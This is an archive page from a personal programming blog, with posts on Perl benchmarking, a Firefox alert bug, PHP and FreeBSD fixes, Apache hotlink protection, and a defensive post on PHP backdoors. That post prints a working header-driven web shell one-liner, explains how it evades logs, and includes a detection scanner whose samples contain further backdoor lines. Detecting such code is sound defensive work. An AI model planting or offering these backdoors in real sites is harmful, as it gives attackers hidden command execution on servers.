Archive for the ‘Code’ Category.

perl, string compare, dprof

This may be old news for people more familiar with perl internals.

dpk@dpk1:~$ perl -version | head -2

This is perl, v5.8.8 built for i486-linux-gnu-thread-multi
dpk@dpk1:~$ cat test1.pl
#!/usr/bin/perl

use strict;

my $x = 0;
while ($x < 100)
{
  &doit();
  $x++;
}

sub doit() {
  my $foo = 'foobar'; my $x = 0; my $y = 0;
  while ($x < 1000000)
  {
    if ($foo eq 'foofoo')
    {
      $y++;
    }
    $x++;
  }
}
dpk@dpk1:~$ perl -d:DProf test1.pl;dprofpp
Total Elapsed Time = 52.07938 Seconds
  User+System Time = 52.07938 Seconds
Exclusive Times
%Time ExclSec CumulS #Calls sec/call Csec/c  Name
 99.9   52.07 52.070    100   0.5207 0.5207  main::doit
 0.00       - -0.000      1        -      -  strict::bits
 0.00       - -0.000      1        -      -  strict::import
 0.00       - -0.000      1        -      -  main::BEGIN

And then:

dpk@dpk1:~$ cat test2.pl
#!/usr/bin/perl

use strict;

my $x = 0;
while ($x < 100)
{
  &doit();
  $x++;
}

sub doit() {
  my $foo = 'foobar'; my $x = 0; my $y = 0;
  while ($x < 1000000)
  {
    if ('foofoo' eq $foo)
    {
      $y++;
    }
    $x++;
  }
}
Total Elapsed Time = 51.31948 Seconds
  User+System Time = 51.30948 Seconds
Exclusive Times
%Time ExclSec CumulS #Calls sec/call Csec/c  Name
 100.   51.31 51.310    100   0.5131 0.5131  main::doit
 0.00       - -0.000      1        -      -  strict::bits
 0.00       - -0.000      1        -      -  strict::import
 0.00       - -0.000      1        -      -  main::BEGIN

I’ve repeated this little test multiple times, with several different inputs, but the result is always the same: if ('string' eq $variable) is faster than if ($variable eq 'string').

Annoying Firefox Bug

There are sites out there (in the tired “Rick Roll” category) that make it hard to close a tab, by adding hooks that allow for dozens or hundreds of alert dialog boxes to appear, preventing the tab from closing. One is http://www.internetisseriousbusiness.com. Don’t go to this site, unless you want to see the bug in action.

I posted a bug on bugzilla, after doing a search. I didn’t see any, but as there are hundreds of thousands of other bugs on there, I didn’t want to spend hours hunting down an exact match, so I just went ahead with it. Turns out I should have searched for “rick roll,” rather than something more specific such as “javascript alert exit loop” or similar. Ah, well, such is the folly of search engines.

So, it got merged into another bug that’s over 7 years old. Surprisingly, it has only gathered 60 votes in that incredible period of time. I’m asking you, the loyal dpk dot net reader, to use one of your 10000 votes on this bug, and to help raise awareness of this issue, so that it might be squashed.

Looking at the code, it seems like it might involve simply adding another button to the alert dialog box, that would just kill the tab’s javascript context. But, I don’t really know how to do all that. It kinda looks like there’s different alert box code for each “platform.” I dunno. I’m no mozilla pro.

Quality with a capital P

The pdf extension library shipped with PHP-4.4.7 doesn’t work, and it’s a known “non-bug”. I’m not sure why they still ship the broken library. I installed the PECL version, via pear (my first time trying that), and that was pretty painless. It created a pdf.so and put it in some long /usr/local/lib path. So I figured, now I can just load it with:

dl("/usr/local/lib/php/extensions/no-debug-non-zts-20020429/pdf.so");

right? Wrong:

Warning: dl(): Unable to load dynamic library './/usr/local/lib/php/extensions/no-debug-non-zts-20020429/pdf.so' - Cannot open ".//usr/local/lib/php/extensions/no-debug-non-zts-20020429/pdf.so" in /root/test.php on line 7

I have “./” as my extension_dir in php.ini. dl() doesn’t recognize an absolute path at all: it unconditionally glues extension_dir onto the front of whatever you hand it, which is exactly what the warning shows (“./” + “/usr/local/…”), so the library is looked up relative to the current directory. The fix, according to posters on http://www.php.net/dl, is to prepend enough ../’s to climb from the script’s directory back up to / before calling dl()! (The saner fixes are to point extension_dir at the directory PECL actually installed into, or to add extension=pdf.so to php.ini and not call dl() at all. Note also that later PHP releases refuse any dl() argument containing a directory separator, so the ../ trick has a limited shelf life.)

The resulting code (with helpful dpk-comments) is:
<?php
// This is required, and is astounding.
// Replace each "/segment" of the script's directory with "../", so that
// extension_dir ("./") followed by this prefix climbs back up to "/".
// This assumes the working directory is the script's directory, which is
// true under Apache but not when run from the CLI.
$dotdots = preg_replace('#/([^/]+)#', '../', dirname(__FILE__));
$dlpath = $dotdots . '/usr/local/lib/php/extensions/no-debug-non-zts-20020429/pdf.so';
dl($dlpath);
// My brain still hurts.
$p = PDF_new();
?>

Commonly found PHP backdoors, Vol. 1

Are you a webmaster who is concerned about hackers infesting your sites? Well, be on the lookout for crud like this:

<? passthru(getenv("HTTP_ACCEPT_jayman")); ?>

This one-liner executes whatever command is sent in an “Accept-jayman:” HTTP header: the web server hands request headers to PHP as HTTP_* environment variables, getenv() reads that one, and passthru() runs it through the shell and streams the output straight back in the HTTP response. “jayman” is just an example (a prevalent one); the header name can be anything. The line can be dropped into any of your PHP scripts without affecting your users’ experience, because no browser sends that header, so on normal requests there is nothing for it to run. Headers are also not typically logged: the default access-log formats record only Referer and User-Agent, so the attacker’s commands never show up in the logs you would normally inspect. (Apache can log a specific request header with %{Accept-jayman}i in a LogFormat, but only once you already know the name to look for.)

I’ve seen this come up quite often, and it actually seems to be getting worse. Most of the time the attackers just want a place to run an IRC bot (iroffer), but often they want to redirect your surfers to their affiliate program links, send spam, or use your site to host their spam-advertised content.

If you see something like this in your scripts, or sitting in a file of its own, it was put there by an attacker who gained write access through some other exploitable script on your site; deleting the backdoor without finding and fixing that original hole just means it comes back. It’s very important to keep your site’s scripts up to date, and it’s a good idea to hire someone to audit your code or keep it up to date if you’re not a programmer yourself. (Be aware that whoever you hire may not actually be able to debug all of your scripts, if any of them use Zend Encoder created files.)

It’s also important to make sure your permissions are not overly open. PHP scripts, typically, run as the web server’s user. If your directory permissions are open (777, for example), and you have an exploitable script, someone could easily create their own files in the directory, and even replace your files with their own copies.

Ultimately, the best advice I can give is to check your site’s contents often, keep your software up to date, keep your permissions sane, and hire someone knowledgeable and trustworthy to check out your site if you find you need help.
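“Check your site’s contents often” is easier with something that does the looking for you. The scanner below is an added example, not code from the original post: it flags the passthru(getenv("HTTP_...")) pattern shown above and its siblings (system, exec, shell_exec, eval, assert fed from getenv() or the request superglobals), and separately flags any reference to an HTTP_* variable that no real browser produces, which catches the header-driven variants even when the command is stashed in a variable first. The list of legitimate header variables and the three sample PHP files are constructed for the example; the scanner is line-local and does not follow variables across lines, so treat hits as leads to read, not as proof.

```python
"""Find header-driven PHP backdoors of the passthru(getenv("HTTP_...")) kind.

Line-local heuristic scanner.  It flags (a) a command or eval sink whose
argument list contains request-derived data on the same line, and (b) any
reference to an HTTP_* variable that browsers never send.  Variable
indirection across lines is not tracked, so hits are leads, not proof.
"""
import os
import re
from typing import Dict, List, Tuple

Finding = Tuple[int, str, str]  # (line number, reason, offending line)

# Functions that hand a string to the shell or to the PHP interpreter.
SINK_NAMES = r"passthru|system|exec|shell_exec|popen|proc_open|eval|assert"

# Attacker-controlled inputs: CGI-style environment variables (request
# headers arrive as HTTP_<NAME>) and the request superglobals.
SOURCES = r"(?:getenv\s*\(|\$_(?:SERVER|GET|POST|COOKIE|REQUEST)\s*\[)"

# A sink name (PHP function names are case-insensitive), its opening
# parenthesis, then a source somewhere inside the same statement.
DIRECT = re.compile(r"(?<![A-Za-z0-9_])(?i:" + SINK_NAMES + r")\s*\([^;]*?" + SOURCES)

HTTP_VAR = re.compile(r"HTTP_[A-Za-z0-9_]+")

# Header-derived variables a browser or proxy legitimately produces, plus
# PHP's own HTTP_*_VARS long arrays.  Constructed for this example; extend
# it for your site.  Anything else (HTTP_ACCEPT_JAYMAN, HTTP_X_RUN, ...)
# has no business appearing in honest application code.
KNOWN_HTTP_VARS = {
    "HTTP_HOST", "HTTP_USER_AGENT", "HTTP_ACCEPT", "HTTP_ACCEPT_LANGUAGE",
    "HTTP_ACCEPT_ENCODING", "HTTP_ACCEPT_CHARSET", "HTTP_REFERER", "HTTP_COOKIE",
    "HTTP_CONNECTION", "HTTP_KEEP_ALIVE", "HTTP_CACHE_CONTROL", "HTTP_RANGE",
    "HTTP_X_FORWARDED_FOR", "HTTP_X_FORWARDED_PROTO", "HTTP_X_REQUESTED_WITH",
    "HTTP_AUTHORIZATION", "HTTP_IF_MODIFIED_SINCE", "HTTP_IF_NONE_MATCH", "HTTP_ORIGIN",
    "HTTP_GET_VARS", "HTTP_POST_VARS", "HTTP_COOKIE_VARS", "HTTP_SERVER_VARS",
    "HTTP_ENV_VARS", "HTTP_POST_FILES", "HTTP_SESSION_VARS", "HTTP_RAW_POST_DATA",
}


def scan_php(source: str) -> List[Finding]:
    """Return one finding per suspicious line of PHP source text."""
    findings: List[Finding] = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if DIRECT.search(line):
            findings.append((lineno, "request data passed straight to a command/eval sink", line.strip()))
            continue
        for var in HTTP_VAR.findall(line):
            if var.upper() not in KNOWN_HTTP_VARS:
                findings.append((lineno, f"reads header variable {var} that no browser sends", line.strip()))
                break
    return findings


PHP_EXTENSIONS = (".php", ".php3", ".php4", ".phtml", ".inc")


def scan_directory(root: str) -> Dict[str, List[Finding]]:
    """Scan every PHP-like file under root; maps path -> findings (hits only)."""
    hits: Dict[str, List[Finding]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = scan_php(fh.read())
            except OSError:
                continue
            if findings:
                hits[path] = findings
    return hits


# Constructed sample files (not taken from any real site).
SAMPLE_INFECTED = """<?php
require_once 'config.php';
echo '<h1>Welcome</h1>';
passthru(getenv("HTTP_ACCEPT_jayman"));
$ua = $_SERVER['HTTP_USER_AGENT'];
if (isset($_SERVER['HTTP_X_RUN'])) { system($_SERVER['HTTP_X_RUN']); }
eval(base64_decode($_POST['p']));
"""

SAMPLE_INDIRECT = """<?php
$c = getenv("HTTP_ACCEPT_jayman");
passthru($c);
"""

SAMPLE_CLEAN = """<?php
$lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
header('Content-Type: text/html; charset=utf-8');
echo htmlspecialchars($lang, ENT_QUOTES, 'UTF-8');
"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # e.g. python scan.py /var/www/html
        for path, found in scan_directory(sys.argv[1]).items():
            for lineno, reason, text in found:
                print(f"{path}:{lineno}: {reason}\n    {text}")
    else:
        for lineno, reason, text in scan_php(SAMPLE_INFECTED):
            print(f"sample:{lineno}: {reason}\n    {text}")
```

On the constructed infected sample it reports lines 4, 6 and 7; the indirect sample is caught only by the unknown-header rule on line 2, which is why that second rule is worth keeping even though it can false-positive on sites that legitimately read custom headers (add those names to the known list). Run it against a document root with `python scan.py /var/www/html`, and run it regularly, since the point of this backdoor is that nothing else on the box will tell you it is there.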

Stability rant from unixblog

When is stability going to finally trump features?

In just about anything related to computers, there’s a tug of war between adding new features or fixing bugs. … in the general computing world, people don’t get sued for bugs, and adding new features is much more fun and sexy than fixing bugs.

I’m in total agreement with this guy. Just going for the free trackback here, heh.

FreeBSD ports fix

If you ever find yourself in my situation, where installing some updated port from a relatively freshly done cvsup ends up breaking a couple dozen other programs because it decided to upgrade several libraries, you might find the following for loop useful. Read it from the inside out: the innermost loop runs ldd over every binary in /usr/X11R6/bin and prints the names of those with a “not found” shared library; the next loop looks each name up in the installed-package databases under /var/db/pkg to find which package owns it; the next pulls the port origin (category/name) out of each package’s +CONTENTS; and the outer loop rebuilds and reinstalls that port.

cd /usr/X11R6/bin && for m in $(
  for l in $(
    for j in $(for i in *; do ldd $i 2>/dev/null | grep -q "not found" && echo $i; done); do
      egrep "bin/$j" /var/db/pkg/*/+CONTENTS
    done | sort -u | cut -f1 -d:
  ); do grep " ORIGIN" $l; done | cut -f2 -d: | sort -u
); do
  cd /usr/ports/$m && make && make deinstall && make reinstall
done

Obviously, the above is evil in itself, so it should be considered a “quick fix” and nothing more. Two things to watch: egrep "bin/$j" is a substring match, so a broken xterm will also drag in any package that owns something like bin/xterm2, and the unquoted $i and $l will misbehave on names with spaces. The same broken-library check is packaged as pkg_libchk in sysutils/bsdadminscripts, if you would rather not type this again. Enjoy!

mod_hotlink 1.0 released

mod_hotlink is some software I wrote ages ago to deal with the problem of how to politely* prevent one site from linking to images on another, without using tons of CPU (as mod_rewrite-based solutions do).

From the README:

Protects non-text content against “hotlinking” – a method for stealing
bandwidth by linking images and content from other websites to present
them as if they were their own.

For Apache 1.3, fully tested with 1.3.26, also works with later
versions. Not tested and not expected to work with 2.x without some
effort. Finally got around to creating a project for it, so hopefully
if it is found to be of use, a group effort will make something more
of it.

Please note: The Referer header sent by browsers is completely
optional, and often untrustworthy. There is very little anyone can
do about that. So, this won’t protect you from all hotlinking. In
practice, it works for most browsers.

* Politely as in people can still do it if they disable sending of referrer information, of course.